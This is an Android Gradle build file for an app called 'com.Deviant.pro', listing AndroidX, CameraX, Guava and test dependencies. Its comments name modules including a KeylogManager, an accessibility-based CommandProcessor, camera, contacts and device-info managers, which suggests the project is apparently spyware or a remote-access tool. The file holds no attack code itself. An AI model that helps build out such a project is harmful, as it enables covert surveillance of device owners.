apply plugin: 'com.android.application'

android {
    compileSdkVersion 35

    defaultConfig {
        applicationId "com.Deviant.pro"
        minSdkVersion 21
        targetSdkVersion 35
        versionCode 1
        versionName "1.0"
    }

    compileOptions {
        sourceCompatibility JavaVersion.VERSION_17
        targetCompatibility JavaVersion.VERSION_17
    }

    buildTypes {
        release {
            minifyEnabled true
            shrinkResources true
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
        debug {
            applicationIdSuffix ".debug"
            debuggable true
        }
    }

    buildFeatures {
        viewBinding true
    }

    packaging {
        resources {
            // Guava and CameraX both bundle these — exclude to avoid merge conflicts
            excludes += [
                'META-INF/INDEX.LIST',
                'META-INF/DEPENDENCIES',
                'META-INF/LICENSE',
                'META-INF/LICENSE.txt',
                'META-INF/NOTICE',
                'META-INF/NOTICE.txt'
            ]
        }
    }
}

dependencies {
    implementation fileTree(dir: 'libs', include: ['*.jar'])

    // ----------------------------------------------------------------
    // AndroidX Core
    // ----------------------------------------------------------------
    implementation 'androidx.appcompat:appcompat:1.7.0'
    implementation 'androidx.constraintlayout:constraintlayout:2.1.4'
    implementation 'androidx.core:core-ktx:1.13.1'

    // ----------------------------------------------------------------
    // Material Design
    // ----------------------------------------------------------------
    implementation 'com.google.android.material:material:1.12.0'

    // ----------------------------------------------------------------
    // Lifecycle — LifecycleOwner used by CameraManager
    // ----------------------------------------------------------------
    implementation 'androidx.lifecycle:lifecycle-viewmodel:2.8.7'
    implementation 'androidx.lifecycle:lifecycle-livedata:2.8.7'
    implementation 'androidx.lifecycle:lifecycle-runtime:2.8.7'

    // ----------------------------------------------------------------
    // CameraX — CameraManager.java
    // ----------------------------------------------------------------
    def camerax_version = "1.3.4"
    implementation "androidx.camera:camera-core:$camerax_version"
    implementation "androidx.camera:camera-camera2:$camerax_version"
    implementation "androidx.camera:camera-lifecycle:$camerax_version"

    // ----------------------------------------------------------------
    // Guava — ListenableFuture for ProcessCameraProvider.getInstance()
    // ----------------------------------------------------------------
    implementation 'com.google.guava:guava:33.2.1-android'

    // ----------------------------------------------------------------
    // Accessibility — CommandProcessor.java / KeylogManager
    // (built into Android SDK — no extra dep needed, but annotation
    //  support requires this)
    // ----------------------------------------------------------------
    implementation 'androidx.annotation:annotation:1.8.2'

    // ----------------------------------------------------------------
    // Contacts / Device Info — ContactsManager, DeviceInfoManager
    // (uses ContentResolver, ActivityManager, StatFs — all in SDK)
    // ----------------------------------------------------------------
    // No extra dependencies needed — all Android framework APIs

    // ----------------------------------------------------------------
    // Testing
    // ----------------------------------------------------------------
    testImplementation 'junit:junit:4.13.2'
    androidTestImplementation 'androidx.test.ext:junit:1.2.1'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.6.1'
}
